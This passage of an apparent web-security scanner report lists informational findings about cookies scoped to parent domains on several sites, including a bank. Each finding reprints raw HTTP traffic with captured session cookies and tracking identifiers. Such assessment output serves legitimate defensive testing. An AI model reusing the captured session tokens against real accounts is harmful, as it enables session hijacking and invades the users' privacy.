GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:18 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:22:19 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13

<html></html>

14.47. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15220

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

14.48. http://spamlaws.us.intellitxt.com/al.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /al.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/javascript
Content-Length: 38
Date: Tue, 26 Apr 2011 14:21:08 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1();}catch(e){}

14.49. http://spamlaws.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=10143 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:56 GMT
Age: 0
Connection: keep-alive
Content-Length: 11702

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

14.50. http://tc.bankofamerica.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?siteID=429&ts=1303820777101&location=http%3A%2F%2Fwww.bankofamerica.com%2Fweblinking%2F%3Freferredby%3Dfuturescholar%26BOA_0020%3D20110426%3A0%3AO%3A6b53285b-42d1-44c7-a12875a0670c1eb1%26state%3DMA%26BA_0021%3Dfalse&tagv=4.3&tz=-300&r=empty&title=Bank%20of%20America%20%7C%20Important%20Notice%20%7C%20Web-linking%20Information&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:26:08 GMT
Connection: Keep-Alive
Content-Type: image/gif
Content-Length: 43
Set-Cookie: TCID=0007af7b-75ac-4458-89c7-86020000005a;path=/;domain=bankofamerica.com;expires=Fri, 26-Apr-2013 12:26:08 GMT;
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Last-Modified: Tue, 26 Apr 2011 12:26:08 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:26:09 GMT;path=/;domain=bankofamerica.com

GIF89a.............!.......,............Q.;

14.51. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 139
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>No siteID in request</P>
   </BODY>
</HTML>

14.52. http://threats2.paretologic.safecart.com/pcha/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://threats2.paretologic.safecart.com
Path:   /pcha/download

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pcha/download?3562113 HTTP/1.1
Host: threats2.paretologic.safecart.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 14:00:42 GMT
Server: Apache
Set-Cookie: paretologic=4L4db6cea6aaf4b16-threats2-rwire; expires=Mon, 18-Jul-2011 05:36:42 GMT; path=/; domain=.safecart.com
Location: http://www.paretologic.com/download/pchealthadvisor/revenuewire
Vary: Accept-Encoding,User-Agent
SRV-ID: web01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


14.53. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: translate.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:24:55 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=e7f86557588674ba:TM=1303827895:LM=1303827895:S=bchmYUfkIWquHABD; expires=Thu, 25-Apr-2013 14:24:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1404

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...

14.54. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?page=login&cmd=approval HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 158
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:45:09 GMT
Location: /?page=login&cmd=approval&a=1
Server: Microsoft-IIS/7.0
Set-Cookie: storemember2=authkey=; expires=Mon, 25-Apr-2011 00:46:08 GMT; domain=afreshbunch.com; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:46:08 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&amp;cmd=approval&amp;a=1">here</a>.</body>

14.55. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:22:51 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:22:51 GMT
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rarhzzt74SRcLv3FkL64au2:15pp20g5d; Path=/
Set-Cookie: BOA_0020=20110426:0:O:49008707-c17e-4746-931599acf898a369; Expires=Sat, 26 Apr 2031 12:23:11 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47814


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

14.56. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=gR5vcd2T/9Pc8ggsnVIGFH2qS8UPe2InnEOKagmWCynRXczda87F4qQCcxXuFUHUslSW1KHy/MNQvuu5a0LFHQ+Yb+bXZGJG4jTdlo9tzaaaKPx3Pagvvtj1nZrTvP4C46pkodCH4CDcB/3rGd3UgOWOSL4lcJfCqsncm1lYr6e/ggBvgbwAsg3ni4IblWDlcCFGxK6jvqACOjfn31o65GuqLQK0WtCQcW/tfxLNdLJ638dCE54AhZ4CJ6m42FeUmuFs2SXlyGiAzf+yLMGl+4hznDezzrBb/w3+N6PBIomj/sT2UCohDEmUTPyi/ZkV4wm9V+sBOUDySiXavKZak292O/W0gh9tk4PU4ZYiGNpxKH6gw9tMSXhsc9r7Zp5pMJQd8kUkt6VJnO6g2Ef2bEAraf+WGZI5kQorViWkIFPPu+x0DweCzY+yWJ5folKswk4G/dYJP9N2U6ybWc8jHuQ6r20V37uYeqO878kY4Zp47DVGcyRzQZ4guLBaha65; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000zX4AQQUcvRQK0iSsbAUjzzb:12qb4k7c1; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...

14.57. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; cmRS=&t1=1303820662510&t2=1303820667589&t3=1303820694026&t4=1303820634257&lti=1303820694026&ln=&hr=javascript%3Adocument.stateSelectForm.submit%28%29%3B&fti=1303820694029&fn=state%20selector%20page_stateSelectForm%3A0%3B&ac=0:S&fd=0%3A3%3Astate%3B&uer=&fu=https%3A//www.bankofamerica.com/ProcessUser.do&pi=state%20selector%20page&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:24:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000dPG6ydQHxVjJLDzLY5rQEzC:157dm9o29; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47731


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

14.58. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 12:46:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=00003O0kJlXrnqBcEyceskzwEx7:15povac7t; Path=/
Set-Cookie: state=""; Expires=Sun, 23 Oct 2011 12:46:49 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


